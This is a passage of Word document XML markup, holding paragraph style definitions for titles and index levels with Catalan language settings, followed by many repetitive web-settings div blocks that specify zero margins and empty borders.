    <w:link w:val="Ttulo2"/>
    <w:rsid w:val="00454E29"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ca-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TtuloCar"/>
    <w:qFormat/>
    <w:rsid w:val="00B70C80"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="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0C80"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="ca-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice1">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BD49D1"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="220" w:hanging="220"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice2">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BD49D1"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="440" w:hanging="220"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice3">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:rsid w:val="00BD49D1"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="660" w:hanging="220"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice4">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:rsid w:val="00BD49D1"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="880" w:hanging="220"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice5">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:rsid w:val="00BD49D1"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="1100" w:hanging="220"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice6">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:rsid w:val="00BD49D1"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="1320" w:hanging="220"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice7">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:rsid w:val="00BD49D1"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="1540" w:hanging="220"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice8">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:rsid w:val="00BD49D1"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="1760" w:hanging="220"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice9">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:rsid w:val="00BD49D1"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="1980" w:hanging="220"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulodendice">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="ndice1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BD49D1"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="360" w:after="240"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>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9732">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="284969696">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="29120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182985325">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1401829977">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="234777564">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="191039726">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="70995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2556">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="216551020">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="150953133">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="112747183">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1743485984">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="6653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50172">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1945769862">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1458599371">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="459880913">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="333995072">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="692927540">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1048534875">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1061363255">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="994258226">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1727803791">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="152116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98498">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="257565869">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="187152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428963">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="291130651">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1106730475">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="202685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03898">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1334842383">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="175998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54987">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="306713413">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="70125325">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="122606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33535811">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="422260977">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2066219379">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1153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42497">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="450827378">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="982731148">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="55640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970458">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="540167819">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="592786776">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="635330366">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1774202257">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1126702295">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1849325007">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="112160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5025">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
